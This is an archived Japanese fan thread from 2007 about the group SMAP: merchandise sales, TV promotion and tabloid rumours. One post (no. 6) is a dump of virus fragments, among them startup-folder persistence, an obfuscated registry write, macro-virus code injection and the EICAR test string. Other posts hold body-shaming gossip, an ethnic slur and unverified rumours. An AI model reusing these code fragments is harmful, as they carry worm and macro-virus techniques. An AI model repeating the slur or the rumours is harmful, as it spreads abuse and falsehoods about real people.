5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【5スマ】SMAP雑談スレPart9【大好き】

1 :スマ姐さん:2007/01/04(木) 23:00:49 ID:5hCMVFUL
5スマがみんな大好きな人達の専用スレ。
一押しがいても全然OK。スマ番組の感想でも雑談でも何でもどうぞ。
スマタレ1人の話題でも構いません。スマ大好きはみんな来て!

前スレ
【5スマ】SMAP雑談スレPart8【大好き】
http://tv8.2ch.net/test/read.cgi/smap/1160538284/

2 :スマ姐さん:2007/01/04(木) 23:43:59 ID:3NUvfIGQ
>>1
乙です

3 :スマ姐さん:2007/01/05(金) 00:10:03 ID:Zt7h7093
>>1 乙華麗

4 :スマ姐さん:2007/01/05(金) 12:25:21 ID:SCcHEcfJ
>>1
乙です

前スレ980-998、1000
は何故に次スレを待てなかったんだ

蛇波…イラストのみアップ←慎吾
最近黒ウサギをよくみるが大丈夫なのか?

5 :スマ姐さん:2007/01/05(金) 13:22:10 ID:SEKk6pvz
スマショ、チョコ増えたのか?
今日は知らんけど、昨日410ちょいで大買えた☆.。.:*・゚★.。.:*・゚
まだ100枚は軽く残ってた。客から見えない所にあったかもだし。
苦情多くて増やした???

6 :スマ姐さん:2007/01/05(金) 14:08:08 ID:O73/1+Qf
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

7 :スマ姐さん:2007/01/05(金) 15:24:18 ID:2t95dnVx


07年最新版・芸能界「愛の相関図」


木村拓哉、的場浩司、諸星和己、YOSHIKI


週刊現代


8 :スマ姐さん:2007/01/05(金) 16:08:17 ID:FZ5LXZdO
>>5           何時頃並んで買えましたか? 明日行く予定なので参考までに教えて下さい

9 :スマ姐さん:2007/01/05(金) 21:42:09 ID:zXIKarml
木村拓哉の子供が太田の英語の学校に入学するらしいね

10 :スマ姐さん:2007/01/05(金) 23:25:26 ID:SEKk6pvz
>>8
9時すぎだけど・・・
もう最後だし、土日だし・・・
早起きガンガー

11 :スマ姐さん:2007/01/06(土) 00:33:23 ID:9oU8p+Vw
>>8
>>10姐さんの言う通り
最後の土日だから
聞いても全く参考にはならないと思う

土日と言う事だけなら
朝7時前に到着でも危ないけど、
最後だし衣装変わってるし…で
既にチョコ手に入れた姐さんも
集合するんジャマイカ?

大チョコ欲しいならとにかく朝ガンガレ

12 :スマ姐さん:2007/01/06(土) 12:58:48 ID:+Buux0CQ
>>10          >>11 ありがとう 8時〜並んで大チョコGetできました

13 :スマ姐さん:2007/01/06(土) 16:28:23 ID:nZIxbGN9
270 名前:名無しさん [2007/01/02(火) 22:01:18]
拓哉が結婚した時、他Gとかスマメンバーはどんな感じだった?

271 名前:名無しさん [2007/01/02(火) 22:03:14]
将来静香の暴露本とかできそう〜

272 名前:名無しさん [2007/01/02(火) 22:04:22]
>270  当時の事しらないんだ。酷かったキムラの顔色も

273 名前:名無しさん [2007/01/02(火) 22:06:02]
>271  何人の男が登場するかな?

274 名前:270 [2007/01/02(火) 22:06:31]
結婚してから拓哉ファンになったから知らない。だから今すごく気になる!

275 名前:名無しさん [2007/01/02(火) 22:08:04]
>270  中居が主催でメンバーで焼肉屋で結婚祝いをやった。

276 名前:名無しさん [2007/01/02(火) 22:09:32]
拓哉も暴露本に書かれるんだろうな。かわいそうに

277 名前:名無しさん [2007/01/02(火) 22:11:52]
ライブのMCでは普通に祝ってた。でもTVではふれてない。他のGも特にコメントとかはしてなかったとオモ。

278 名前:名無しさん [2007/01/02(火) 22:11:55]
結婚祝いやったんだ!そこに静香も行ったの?メンバーは子供見たことあるのかな?

279 名前:名無しさん [2007/01/02(火) 22:13:39]
結婚祝いはツアー中にメンバーだけでやった。
FNS歌謡祭で司会者に「おめでとう」って言われてたような…
当時のサンスマのキムラの顔にびっくりしたよ、魂が抜けた様な顔。


14 :スマ姐さん:2007/01/06(土) 22:27:23 ID:4xb2TRVE
ナボコ〜(^O^) ナボコ〜 アタシさ。明日2丁目のドラッグクインのパーティに行くんだけど。アンタもおいでよ!紹介してあげるわよ。夜から朝まで飲んで踊りまくり楽しいわよ。よかったら書いといてね。ヨロピク(^o^)/

15 :スマ姐さん:2007/01/06(土) 22:38:39 ID:z/DA2OQe
五郎結婚てまじ!?

16 :スマ姐さん:2007/01/06(土) 23:52:50 ID:NmMqt6FQ
>>15
東スポだろ、いい加減にしろよ(`д´♯)

17 :おはよ(^o^)/:2007/01/07(日) 06:00:30 ID:5Rj+dUJ/
なぼこちゃん今日の件は、ヨロピク
今日は雨も降らないし素敵な夜になるわね! 朝まで飲みまくりよ。そして乱交も出来るかもしれないわね(*^_^*)楽しみね。

18 :スマ姐さん:2007/01/07(日) 10:16:15 ID:obtbGUXD
今日はいよいよスマショ最終日だな!
昨日と違って天気もいいし
行く姐さん方よかったな


大混雑は覚悟の上で
漏れも出掛けてみよう加納…
今からじゃ大チョコはおろか
小チョコも売切れだろうけどw


19 :スマ姐さん:2007/01/07(日) 10:39:13 ID:QikykgUf
今日はスマショの最終日
閉店は17時と早いため、整理券も配布終了しますた

20 :スマ姐さん:2007/01/07(日) 10:52:11 ID:RLs0uv1L
はやっ。

21 :スマ姐さん:2007/01/07(日) 13:18:12 ID:5Rj+dUJ/
アタシは今から2丁目にむかいます。夜の7時頃メモで〇〇してますので、オナガールを見たら声をかけてね!ヲバさん達もよかったらいらして。一緒に踊りましょ(*^_^*)茸茸茸茸

22 :スマ姐さん:2007/01/07(日) 16:13:32 ID:5PqWIpjT
黒バラ最高おおおおおおおおおおおおおおおおおおおおおおおおお
>>1見てないとは言わせない。さあレス汁!

23 :スマ姐さん:2007/01/07(日) 16:19:37 ID:HAdoR/Pb
567 :可愛い奥様:2007/01/06(土) 10:22:10 ID:t2oTj9f/
62歳の母は紅白で蛸がしゃべるのを見て「この人かっこつけてて大嫌い!!」
と心底嫌そうな顔してはき捨てるように言ってたよ。

568 :可愛い奥様:2007/01/06(土) 17:02:59 ID:WttguokR
うちの母(65歳)も「キムタクって人気あるの?」て娘(30代)に聞くタイプ。
かっこいいとは思ったことないみたい。結婚してるのにキムタクが独身者づらしてるのが嫌いだそうだ。
そういやTBSでしつこく特集やってたけど恵の番組かな?蛸の出演ドラマの歴代視聴率のフリップ出してたけど
36%ドラマから一気に次が22%くらいに下がってて、さすがに飽きられてきた時期がこの辺りなんだなとわかった。

571 :可愛い奥様:2007/01/07(日) 04:48:05 ID:ebaW5yHF
TBSの日曜劇場は視聴率悪いから「華麗」がコケたら死に体だろう。必死で宣伝しまくってるけども
「武士」の宣伝のときと同じで作品の宣伝というよりも主役の宣伝になってる気がする。ドラマ自体の魅力を
見せるのがヘタで華麗パンだとか馬鹿馬鹿しさで話題性をだそうとしてる。子供向けアニメじゃあるまいし、あほくさ。

572 :可愛い奥様:2007/01/07(日) 08:26:24 ID:499nO6dK
>571禿同。らっきょ侍の時は映画ではなく蛸の強力プロモーション期間みたいな感じで
うんざりした。これから春までTBSは避けないと。

573 :可愛い奥様:2007/01/07(日) 11:15:34 ID:Mb3ceizJ
原作好きなんで華麗なる一族の公式HP見てがっかり。熱血暴走経営者なら今までの経験で何とか
演じられそうだと思ったのか。日曜劇場だから妻妾同衾とか鉄平の出生の疑惑には触れずに
単に鉄平が悲劇のヒーローになる話になるんだろうな

574 :可愛い奥様:2007/01/07(日) 15:28:14 ID:ebaW5yHF
それしか出来ないんじゃないの。いつもと同じく周りに愛される「型破りの熱血ヒーロー」で、
嫉妬で憎悪され、邪魔されて足をひっぱられる可哀想な美男子。という定型。複雑な人間関係とか
政治経済の話だとか、蛸ファンに理解できない話を削り、すごくわかりやすいメロドラマになってるだろう。
それ以外は演じられないというか、脚本を理解できないんじゃないかな。ジーンズじゃなくて背広を着てるという変化。

24 :スマ姐さん:2007/01/07(日) 16:40:49 ID:2E177jmL
キムタクの話題ばっかり・・・・。
他のメンバーの話題は無いのか・・・・

25 :スマ姐さん:2007/01/07(日) 17:00:52 ID:K1bbn5hY
新年早々同じグループのメンバーの悪口しか言えないのか。
あんたの子供も友達をいじめるようになるだろうね。

26 :慎吾マン:2007/01/07(日) 17:16:03 ID:guuAKYBc
初めまして!!
まったく初心者なんでまったく2ちゃんねるの事知りませんが、書いて見ましたぁ。

27 :スマ姐さん:2007/01/07(日) 20:09:17 ID:pa43ypCY
>>23
女30にもなってここには来たくないなw

>>25
スマスマ特別編を見れば大丈夫!

28 :スマ姐さん:2007/01/08(月) 00:04:15 ID:WAxhOMiY
スマップ、今年活動休止って本当!?

29 :スマ姐さん:2007/01/08(月) 09:26:51 ID:0GxsI1Py
日本に住んでないのか?元旦からスマップ番組やってるだろ?

30 :スマ姐さん:2007/01/08(月) 10:55:59 ID:q0VkUP68
おはよ。あたしグダグダよ。後でレポートするわね。おやすみ(-o-;)

31 :スマ姐さん:2007/01/08(月) 14:06:36 ID:q0VkUP68
おはよ(^o^)/
まあ目覚めがいいわ。ナボコはこなかったけど。ホントに楽しい一時でした!あたしはこれからサウナにいって汗をかいてサッパリしたらビールでも飲みたい気持ちでしゅ巣ロピク

32 :スマ姐さん:2007/01/08(月) 15:36:24 ID:0rYPzZK9
ID:HAdoR/Pb
ここも鬼女にぶっすまか
どこ見てもぶっすまってどういうことだw

33 :スマ姐さん:2007/01/08(月) 17:10:54 ID:mk0r79Ve
575 :可愛い奥様:2007/01/07(日) 19:36:29 ID:tvmX6Zyv
キムタクのスーツ姿は背伸びしたガキって感じだね。
確実に老化は進んでるのにガキっぽさがどーしてもぬけない。中身が幼稚なんだね。

576 :可愛い奥様:2007/01/07(日) 22:29:05 ID:dj359GfQ
もともと童顔だからかね。スーツは確かに似合わない。見慣れないだけでなく。
しかしここ見てたら、むしろ原作は読みたくなったじゃねーかw

577 :可愛い奥様:2007/01/08(月) 01:40:53 ID:02QX42gs
原作を蛸ドラマに改変しているんだよね。蛸の役は原作では、脇役なのに・・・・
もうこれだけで読む気なくなる。

578 :可愛い奥様:2007/01/08(月) 03:40:49 ID:hkmbbM22
よくヘッポコドラマで言う、「原作と違う目線で」「ドラマだけのオリジナルエンディング」
と言うヤツか。 原作が完成されていればいるほど、余計なことするな!と思うね。

579 :可愛い奥様:2007/01/08(月) 09:15:01 ID:xhnYAbI+
昨日だったか新聞に「華麗なる〜」の集合写真が
載ってたけど、ちょっとだけ蛸が哀れになったわ。
座高まじで高杉!!
反対側に座ってるヤマコーとの差は何?
横に立ちたくないだろうな〜

580 :可愛い奥様:2007/01/08(月) 09:43:48 ID:YrgE3lCu
>579
その身長差っていうのもシークレットシュ・・・いや、なんでもない。

581 :可愛い奥様:2007/01/08(月) 12:29:42 ID:Mz1/vpHb
原作は金融再編にからむ銀行と政財界の関係がメインの話なのに
パパが意地悪でお金貸してくれないから僕の会社つぶれちゃった〜
って話に変換されちゃうのか_| ̄|○
NHKあたりで原作を生かして別なキャストで作ったら絶対見るんだけどな〜

34 :スマ姐さん:2007/01/08(月) 18:25:26 ID:ewvYQpaW
草なぎヲタは基地外板とぶっすまスレから出てくるな。基地外

35 :スマ姐さん:2007/01/08(月) 18:36:38 ID:6ReCf84N
キムタク安置のいるスレってどこもかもぶっすまがお勧めって笑える

36 :スマ姐さん:2007/01/08(月) 18:51:09 ID:p3ksY2zj
日本語でおk

37 :スマ姐さん:2007/01/09(火) 01:31:16 ID:YOUxmhek
自分が見てんだろぷっすまスレキム婆ww それからぶっすまじゃないよ全部そうなってるけど。

38 :スマ姐さん:2007/01/09(火) 07:00:00 ID:tCWJoOUY
木村の露出が多くんるとアンチもおおくなる。
悪口を書きたいためドラマを観るんだろうから大歓迎だよ。

39 :スマ姐さん:2007/01/09(火) 16:44:41 ID:u0fKRd3g
582 :可愛い奥様:2007/01/08(月) 23:27:03 ID:w/kbWeJa
華麗なる一族の集合写真の蛸、シークレットシューズ見え見えだったよね
蛸は座高まじで高すぎw

583 :可愛い奥様:2007/01/09(火) 00:26:03 ID:lkaahegm
8日付の「東京スポーツ」より
⇒終面:本紙記者がSMAP休業説をキムタクに直撃!
「あん? 何なの、テメエ」〜これが問題の一部始終!!
http://www.tokyo-sports.co.jp/

584 :可愛い奥様:2007/01/09(火) 09:38:41 ID:ou0tB21R
今日のぴったんこかんかんTVラテ欄。まるで2chの目の錯覚系コピペかのようでワロタ

585 :可愛い奥様:2007/01/09(火) 10:36:38 ID:rLEvb/zN
同年代や年下のタレントが俳優業も視野に入れて努力をしていた頃、
蛸がやっていたのは、ボト&ヒアル注入w
それが今の『おばさん顔』に繋がったのが、なんとも皮肉な話。
大人の男の顔じゃないから役幅も狭いし、
今更必死になってバラエティに出まくったところで
なんになるんだろうか。

586 :可愛い奥様:2007/01/09(火) 15:51:28 ID:5spTvGPF
何にもならない。生き恥さらすだけ。

587 :可愛い奥様:2007/01/09(火) 16:19:42 ID:rj7DxBJ2
http://kireaji.net/blog/120/takuya_kimura090107.html#comments
木村拓哉に不倫疑惑!相手は長谷川京子

華麗なる一族の宣伝必死すぎ。
ハセキョー気の毒。
いい迷惑だな。

40 :スマ姐さん:2007/01/09(火) 17:30:37 ID:j6IrA65M
39 木村の露出が気になって仕方がないんだね。
あんたの一押しだって頑張っているじゃない?
くだらないコピペはやめなさい!
自分の言葉で意見を言ったら?
ここはスマ全体のスレですよ。

41 :スマ姐さん:2007/01/09(火) 18:30:37 ID:zhuDYApz
>>35
木村と剛のアンチが出入りしてるんだよ。
IEロムしか反映されないからヲタスレは専ブラで
木村アンチスレとぷっすまはIEで
コピペや回りくどいことせずに直接叩けばいいのに
腐る程アンチスレあんのに

42 :スマ姐さん:2007/01/09(火) 18:44:31 ID:YOfxcN8d
今日朝と夕方のラジオでSMAPがグループとしての活動を休止するって言ってたんですけど、本当なんですかね?
友達も聞いたっていってたけど、ニュースでも流れないし、どうなんだろう

43 :スマ姐さん:2007/01/10(水) 14:34:14 ID:b2wutRH9

SMAPが5人揃っての活動を休業するという噂がある。
それに伴い、『SMAP×SMAP』(フジテレビ)も終了するかも?
この噂を確認するべく、東スポの記者がキムタクに直撃したところ・・・

「木村さん、お疲れ様です」という呼び掛けに、最初こそ無視を決め込んでいたキムタク。
だが「来年、SMAPが活動を休止するという話ですが・・・」と切り出すと、その表情が一変!

「あん?」と、不機嫌そうに記者の顔をにらみつけるや「おまえ誰?何なの、おまえ?」と、吐き捨てた。
そればかりか、記者の着ているスーツに手を伸ばし、媒体名・氏名の記入されたプレートを強引に確認。

「東京スポーツであることを知ると、すかさず「チェッ!」と、舌打ちし、活動休止に対するコメントもなく立ち去った。

44 :スマ姐さん:2007/01/10(水) 14:41:09 ID:PutgHVPf
>>43
あの〜お願いだからゲンダイや東スポネタをここに落とさないでくれないか?
禿ワラで茶〜吹いてもたw

45 :スマ姐さん:2007/01/10(水) 23:50:16 ID:50+NNuo7
>>43
自分が月曜にローカルラジオで聞いたネタは最初はにこやかに挨拶だったぞw
それが東スポってわかると表情が曇り・・・だった
同じ新聞からの紹介なのに微妙に違うのはこれいかに

46 :スマ姐さん:2007/01/11(木) 11:52:47 ID:5KOO9LtU
>>43
東スポもネタ考えんの大変だな!

47 :スマ姐さん:2007/01/11(木) 13:11:14 ID:T0z7Tr6E
東スポって何の為に存在してんの?w

48 :スマ姐さん:2007/01/11(木) 13:46:38 ID:Gp2753MX
東スポの掲載記事で正しいのは日付だけ

49 :スマ姐さん:2007/01/11(木) 14:06:03 ID:lKQejhPV
スポーツ新聞が廃刊になる時代
東スポだって必死、記者にも家族がいる
生き残りをかけて・・・・
だけど、家族に堂々と、自分の仕事言えるんだろうか?
人の嫌がる仕事はたくさんある。
しかし、相手のプライバシーを侵すこと、それをネタに面白おかしく
記事にする。それも仕事と言ってしまえばそれまでか・・・・。
何のために存在しているのか?
存在している以上、きっと楽しみに読んでいる人がいるんだろうね。

50 :スマ姐さん:2007/01/11(木) 14:09:34 ID:PSqEc1ss
ゲンダイも週刊女性も新潮もスマに頼りすぎ。

51 :スマ姐さん:2007/01/11(木) 14:09:59 ID:8/+LLP80
東スポを信じてる人がいることにびっくり。
今までなんかホントのこと書いてたことあったか?

52 :スマ姐さん:2007/01/11(木) 14:12:13 ID:pM+Lkun2
>>51
ない。>>48の言う通り。

53 :スマ姐さん:2007/01/11(木) 16:51:17 ID:5y9z7Iie

二宮和也や岡田准一は映画賞を受賞できるのか

デスク 正月は何してたの?
記 者 初詣で行ったり映画を見たりしました。
デスク そういえば、大晦日に安倍首相が「硫黄島からの手紙」を見に行ったらしいな。お前は?
記 者 見ましたよ。嵐の二宮和也の好演が印象的でした。
デスク 身重の妻を残して召集される一兵卒を演じてるんだっけ?
記 者 そうです。二宮の演技は主演の渡辺謙を食っていると評価する向きもあります。

デスク なるほど。それでアカデミー賞助演男優賞の有力候補に名前が挙がってるってわけか。
記 者 二宮は世界配給が決まっているアニメ映画「鉄コン筋クリート」で声優にも挑戦していますね。
デスク 初日舞台あいさつで「世界的俳優の二宮です」なんて軽口叩いていたけど、
     100%ジョークってわけでもなさそうだな。
記 者 頑張っているといえば、ジャニーズの先輩でV6メンバーの岡田准一もですね。
デスク そうだな。岡田は昨年の暮れに石原裕次郎新人賞を受賞して、
     今週はブルーリボン賞主演男優賞にノミネートされたもんな。
記 者 ただ、後輩の活躍に“彼”の言動が水を差さなければいいんですが……。

デスク 彼?
記 者 キムタクですよ。
デスク あー。日本アカデミー賞で主演男優賞の候補になりながら、辞退しちゃったあれか。
記 者 ジャニーズ事務所の「所属タレントに優劣をつけない」という方針が辞退の理由だったとか。
デスク そうなると、二宮や岡田も、アカデミー賞やブルーリボン賞を辞退しなくてはならないかもな。
記 者 岡田や二宮はテンションが下がるでしょうね。

デスク 辞退してばっかじゃ、ファンだってしらけちゃうよ。
記 者 ワガママな先輩を持った後輩は大変だと思います。
デスク ところで、お前は映画とか初詣では誰と行ったの?
記 者 オンリーワンでしたが、何か?
デスク ……。

54 :スマ姐さん:2007/01/11(木) 17:02:49 ID:T0z7Tr6E
あるファンサイトで新曲の噂を見たがそろそろか?!

55 :スマ姐さん:2007/01/11(木) 17:34:17 ID:uVLgPKAx
新曲の噂!?

56 :スマ姐さん:2007/01/11(木) 17:41:53 ID:SZOSJZQo
慎吾がラジオで新曲を3月くらいに出したい、って言ってたね

57 :スマ姐さん:2007/01/11(木) 18:40:34 ID:T0z7Tr6E
3月かぁ
言われてみれば卒業シーズンに合ってるような曲名だった

嘘か本当か知らんがw

58 :スマ姐さん:2007/01/11(木) 20:31:55 ID:7h1EyP9c
>>48
前にダウンタウンの浜ちゃんがAV女優との不倫について書かれた時に、
そんな事言ってましたね

59 :スマ姐さん:2007/01/11(木) 22:49:05 ID:bymyxsqv
新曲か中居は今年1,2枚出したいって言ってたし楽しみだ
広告企業の知人によると東スポの記事は一種の芸術だそうだ。

60 :スマ姐さん:2007/01/11(木) 23:20:19 ID:ERNd8hTV
噂どおり、俳優にもっと専念したいなら、
3人がいいともを卒業すればいいだけの話だよね。
スマスマやめるほどじゃないし。

61 :スマ姐さん:2007/01/12(金) 10:37:54 ID:dr9ZBn4Z
>中居氏に例の人と結婚の噂が出てますが、どうなんでしょう
>はっきり言って中居氏には身分不相応じゃないかと(苦笑)
>相手の方が何故中居氏を選んだのかも不思議ですが、結婚など万が一してもすぐ失敗するような(笑)
>まー中居氏のビジュアルも酷くなるばかりですから、スーパーマネも結婚でイメチェンしたいのかもしれませんね

>〇さんこんにちは〜!へー結婚記事出たんだ!中野アナは可愛らしい薬にも毒にもならないアナウンサーだと思ってましたが
>ヤツと本当に結婚するとしたら、あまり人を見る目の無いお馬鹿さんだったと世間にインプットされるでしょうねえ〜

>こんばんは〜!全く同感です。今日もスマ友たちとはっきり言って氏にはクボヅカくんの嫁みたいな
>風俗あがりがお似合いでしょと盛り上がってました

>中野美奈子も高島アヤも最初から中居氏香取氏びいきだから大嫌いです。
>この前も拓哉のDVD発売日に「服かったんでしょうかね」と言っててむかつきました
>結婚?中居氏を選ぶ女にロクなのはいませんよ。
>拓哉を選んだ静香さんは、流石です。

62 :スマ姐さん:2007/01/12(金) 10:43:46 ID:FV0VTROq
キムヲタのブログ?

63 :スマ姐さん:2007/01/12(金) 11:48:49 ID:s3hA4rcs
夏コンで初披露→CD化が定番化しそうな気がする

その前に(まさしく3月あたり)1曲出して欲しい

64 :スマ姐さん:2007/01/12(金) 14:12:25 ID:OhOJOfZo
614 :可愛い奥様:2007/01/11(木) 19:34:54 ID:f0LCw53w
華麗なる一族の主演が竹野内なら見る

615 :可愛い奥様:2007/01/11(木) 19:52:07 ID:6qbi+YZJ
反町でも見る

616 :可愛い奥様:2007/01/11(木) 20:47:44 ID:j9/Wobfj
今日のトクダネで、二宮が出ていたね。
オグラが「ジャニーズは国内のショーレースには出さないって言ってるけど、
ニノはどうするの?」と単刀直入に訊くと、
二宮は「(そうなったら)ジャニーズがどうこうっていうより、もらえるものは貰う。ただなんだし」
と答えていた。蛸圧力みたいなものは特にないっぽい。

617 :可愛い奥様:2007/01/11(木) 21:06:19 ID:o5uF95nU
ピンポンの番宣をちらっと見ました。
蛸マンセーに途中で耐えられなくなった。
王様の耳はロバの耳状態だよ

618 :可愛い奥様:2007/01/11(木) 21:20:16 ID:O2Ri8D2A
ハダカの王様では?

619 :可愛い奥様:2007/01/12(金) 08:31:02 ID:nu+TKXpX
朝から被蛸… 髪というより頭が変!
頭皮と第2頭皮の間にフィリングが挟まってそう

620 :可愛い奥様:2007/01/12(金) 09:58:33 ID:Mz7narJV
TBSで華麗なる一族の番宣しまくり。被蛸には皆さん気を付けて。

621 :可愛い奥様:2007/01/12(金) 10:56:27 ID:scAsDz54
金スマには出ないんだな。
でもOPが華麗なる一族の宣伝になったりするのだろうか。

65 :スマ姐さん:2007/01/12(金) 18:31:53 ID:bRNawMV9
なんで木村ファンは木村しか見ないの?
木村ファンの知り合いヲバは木村しか見てなくて、
何でもできそうだよね〜
だってOrz
有り得ない。スマ全員を見てたら低知能指数低偏差値で、他メンがいなきゃ何もできないクソ男ってのが一目瞭然なのになw
他メンの方がスキルが上だっつーの!
スポーツできるふうなのはアレだ。テクないのに
何糞日本め〜
って目の色変えて挑んでくるチョソと一緒なだけなんだよな。
糞試合でも勝ちゃ〜いいのか???
醜いぞなもし〜

66 :スマ姐さん:2007/01/12(金) 19:13:47 ID:s3hA4rcs
>>65
オマエの世界は狭いなぁw
知り合いヲバを基準に考えるなよ

他メンの方がスキル上…
オマエも知り合いキムヲバと変んね〜だろ

67 :スマ姐さん:2007/01/12(金) 19:18:08 ID:26+YAtfH
ID:bRNawMV9
気持ち悪いなこの女反吐が出る

68 :スマ姐さん:2007/01/12(金) 19:35:16 ID:OhOJOfZo


キムタクの華麗なるTBSジャック


14日スタートのTBS系「華麗なる一族」(後9・00)に主演するSMAP・木村拓哉(34)が、
12日にTBS史上初の「5番組生放送ジャック」に挑戦する。

木村は午前5時半スタートの「みのもんたの朝ズバッ!」から「ピンポン!」(前11・00)、
「2時っチャオ!」(後2・00)、「イブニング5」(後4・54)、
そして「NEWS23」(後11・30)の5番組に立て続けに生出演。

1日でこれだけの生放送に出演するのは木村としても、TBSとしても初めてのこと。
「華麗なる-」への木村の気合と思いがこもった結果だ。


キムタク番宣必死すぎwww


69 :スマ姐さん:2007/01/12(金) 20:07:34 ID:d0YNjWlv
蛇波うp
ブログ←剛 イラスト←吾郎

剛、更新遅かったな…

70 :スマ姐さん:2007/01/12(金) 20:34:50 ID:hZ17ieB1
ここのところの木村の露出は驚くばかりだ。
CMもバラも映画とドラマの宣伝もすごい。
まさか木村独立?

71 :スマ姐さん:2007/01/12(金) 22:05:00 ID:XUeYm3p4
蛇波うp
華麗なる一族レポ

72 :スマ姐さん:2007/01/13(土) 00:52:23 ID:UMbiEU3M
さっき何年も一緒にスマコン行ってた友人に
もうスマは卒業するって言われた。
今更相方ってみつかるかなぁ…。
彼女はスマ熱冷めたわけだから仕方ないけど
やっぱり凄い寂しい。今年のライブどうしよう。
周りにコン行きたいって人何人かいるけど
私との温度差がありそうで…。
ああ…毎年の楽しみだった事が
今から憂鬱になっちゃった。
グチスマソ。

73 :さようなら2ちゃんねる(15日終了):2007/01/13(土) 04:13:39 ID:w/coeAGC
みんな、あ・り・が・と・う!!
既に壺を差し押さえさせていただきました。

                      青羽裁判所

74 :スマ姐さん:2007/01/13(土) 17:36:15 ID:oL2oeeBD
624 :可愛い奥様:2007/01/12(金) 23:18:46 ID:rK/oWDkC
最近顔色悪いけど病気?単なる劣化?
http://up.nm78.com/dl/3891.jpg
http://up.nm78.com/dl/3892.jpg
http://up.nm78.com/dl/3893.jpg

625 :可愛い奥様:2007/01/12(金) 23:30:33 ID:bIWotIGC
なんでそんなに頭長いの?!

626 :可愛い奥様:2007/01/12(金) 23:38:15 ID:zEjszp7O
背を高く見せようと髪の毛立ててるからじゃない?もしくはプロピアで増毛してるとか

627 :可愛い奥様:2007/01/13(土) 01:03:48 ID:IWG+WMHH
>624 化粧してこの状態だからスッピンはすごいことになってそう

628 :可愛い奥様:2007/01/13(土) 01:21:40 ID:4bVPpuFs
>624の一番上って、マツオバンダイじゃないの?

630 :可愛い奥様:2007/01/13(土) 02:04:56 ID:29TtDH3o
顔にも金かけて体も鍛えてるはずなのに
どうして頬やあごの下とか身体全体があんなにたるんたるんなんだろう。

631 :可愛い奥様:2007/01/13(土) 09:31:50 ID:sXzmDw50
体鍛えてるなんて話聞いたことがない。キムタク運動神経だってよくないでしょ。

632 :可愛い奥様:2007/01/13(土) 13:51:50 ID:SwBF4X1Y
昔スマスマのマラソンで最初だけかっこつけて颯爽に走ってたけど最後は一番息があがっててバテバテだったよ

634 :可愛い奥様:2007/01/13(土) 17:15:08 ID:Q6SIpo5t
相変わらず加齢の宣伝凄いね。宣伝だからある程度自画自賛になるのは仕方ないとは思うけど、
テレビ史上稀にみる夢のような豪華キャストとナレーションが入る度に、どこがっ!!と1人ツッコミしながら
( ´,_ゝ`)プッ としております。

75 :スマ姐さん:2007/01/13(土) 18:01:58 ID:2sk1KGAq
また鬼女にぶっすまですか。毎日よくやるよ。
わざわざ変な写真探すのも大変だなw

76 :スマ姐さん:2007/01/13(土) 18:13:47 ID:oYoUNHsH
スマ板の安置関係のスレは全部ぶっすまって出るなw


77 :スマ姐さん:2007/01/13(土) 18:32:42 ID:NVlKVJUi
>>75>>76
システムを良く分かってないおばんがいるな。

78 :スマ姐さん:2007/01/13(土) 21:26:41 ID:XWeXQCR9
ぶっすまヲタよ。コピペはいらん。それも鬼女ってw

79 :スマ姐さん:2007/01/13(土) 21:32:50 ID:W+CdLbM2
>75-76
ぷっすまスレでは、おすすめ機能発動一週間以上どのスレともリンクしてなかった
と住人が言ってたよ。突然おすすめ機能利用の荒しが始まったのは今年からとも。
おすすめ機能が真実を伝えていた期間は、せいぜい始まって一週間でしょ。あとは全部擦り付けだから。


80 :スマ姐さん:2007/01/14(日) 05:13:43 ID:H1NOLI1x
>>79
26日時点はこれといって何もなく一週間変化なし、
(厳密にはオススメ機能設置22日から約10日間)
ぷっすま本スレとオススメ機能に変化が表れたのは翌年2日放送時から
(木村と山P安置スレが表示)
鬼女板や安置スレオススメ機能のぷっすま表示報告は最近
報告が頻繁になったのは2日放送から数日後
ぷっすま住人はジャニ、ジャニヲタ嫌い、SMAPのクサナギ認知せず
クサドラマ、他レギュラー絶対禁句、
鬼女板IEロム違和感ありまくりだが
ぷっすまと鬼女板を出入りするヤシがいるんだろうな。

81 :スマ姐さん:2007/01/14(日) 05:20:43 ID:H1NOLI1x
>>79
すまんな連投
昨年12月26日前後が真実!
その後専ブラ対策と安置荒らしIEロムを知って面倒臭いことになった感じ
標的になってもぷっすま住人は相手にせんからやりやすいんだろ
あそこはヲタ臭出すと毛嫌いされる

82 :スマ姐さん:2007/01/14(日) 05:37:04 ID:1DCk8M/h
>>77
機能発動5日間はシステム知らない人の方が多かった。
発動後リンクが出た直後「IE」反映「専ブラ」反映されないことを知ったのが殆ど。

ID:oL2oeeBD
ぷっスレ→鬼女→ぷっスレ→鬼女→スマ板にコピペ
相当な暇人

83 :スマ姐さん:2007/01/14(日) 13:43:58 ID:u0IYkPLu
皆さんはSMAPのポスターをお部屋に貼りますか?
私はありがとうを購入した時のも貼ってなくてそのまま物置にいってます…。

84 :スマ姐さん:2007/01/14(日) 14:44:14 ID:ucGmKo+d
640 :可愛い奥様:2007/01/13(土) 21:07:48 ID:zOW6DPl3
司会の谷原章介が「照明のスタッフのお名前まで覚えてらっしゃるなんてすごいですね」とほめると
木村は「えっ?それは大切なことのひとつだと思うんですけど皆さんどう思いますか?」と照れ笑いしながら答えていた。

